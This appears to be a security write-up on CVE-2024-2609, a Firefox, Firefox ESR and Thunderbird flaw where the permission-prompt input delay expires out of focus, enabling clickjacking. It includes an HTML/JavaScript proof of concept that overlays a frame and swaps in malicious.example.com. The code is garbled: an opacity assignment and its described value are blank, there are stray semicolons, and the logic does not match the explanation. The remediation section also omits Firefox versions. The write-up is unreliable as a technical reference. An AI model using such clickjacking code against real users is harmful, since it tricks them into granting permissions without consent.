CVE-2024-2609: Permission Prompt Input Delay Vulnerability in Firefox, Firefox ESR, and Thunderbird, Leading to Clickjacking Exploits

---

Summary

A new vulnerability (CVE-2024-2609) has been discovered in Firefox, Firefox ESR, and Thunderbird, where the permission prompt input delay could expire while the window is not in focus. This makes it vulnerable to clickjacking by malicious websites, potentially allowing unauthorized access to sensitive information or control over the affected software. The vulnerability affects Firefox versions earlier than 124, Firefox ESR versions earlier than 115.10, and Thunderbird versions earlier than 115.10.

Details and Exploitation

Clickjacking, or "UI Redress Attack," is a well-known malicious technique that tricks users into clicking on hidden elements by overlaying them on top of seemingly legitimate UI components. This can result in unwanted actions being performed on the user's behalf, without their consent or knowledge.

In the case of CVE-2024-2609, the issue exists due to a flaw in managing the permission prompt input delay. When a permission prompt appears, the software implements an input delay to prevent accidental clicks. However, this input delay could expire even when the window is not in focus, making it susceptible to clickjacking.

Here's a sample code snippet demonstrating the exploit

<!DOCTYPE html>
<html>
  <head>
    <style>
      iframe {
        position: absolute;
        left: 70px;
        top: 70px;
      }

      div {
        position: absolute;
        left: 50px;
        top: 50px;
      }
    </style>
  </head>
  <body>
    <iframe src="https://legitimate.example.com"; width="500" height="500" id="controlled"></iframe>
    <div><button onclick="performExploit();" id="clickme">Click Me</button></div>
    <script>
      const frame = document.getElementById("controlled");

      function performExploit() {
        frame.src = "https://malicious.example.com";;
        frame.style.opacity = ;
      }

      frame.onload = function () {
        frame.style.opacity = 1;
      };
    </script>
  </body>
</html>

In the above example, a malicious website manipulates the user into clicking a button that loads a legitimate website with a permission prompt in an iframe. By changing the opacity of the iframe to , the malicious website can overlay the legitimate page and trick the user into clicking the now-invisible permission prompt.

The CVE-2024-2609 vulnerability has been reported in the following security advisory pages

- Mozilla Security Advisory: MFSA2024-29
- National Vulnerability Database (NVD) - CVE-2024-2609

Thunderbird: Upgrade to version 115.10 or later

These updates can be found on the official Mozilla Firefox and Mozilla Thunderbird websites.

Users can also employ browser addons or extensions that aim to protect against clickjacking attacks, such as the NoScript Security Suite for Firefox.

In summary, updating the affected software to the latest versions will help mitigate the CVE-2024-2609 vulnerability, reducing the risk of potential clickjacking exploits and providing a more secure browsing experience.

Timeline

Published on: 03/19/2024 12:15:08 UTC
Last modified on: 08/28/2024 15:35:21 UTC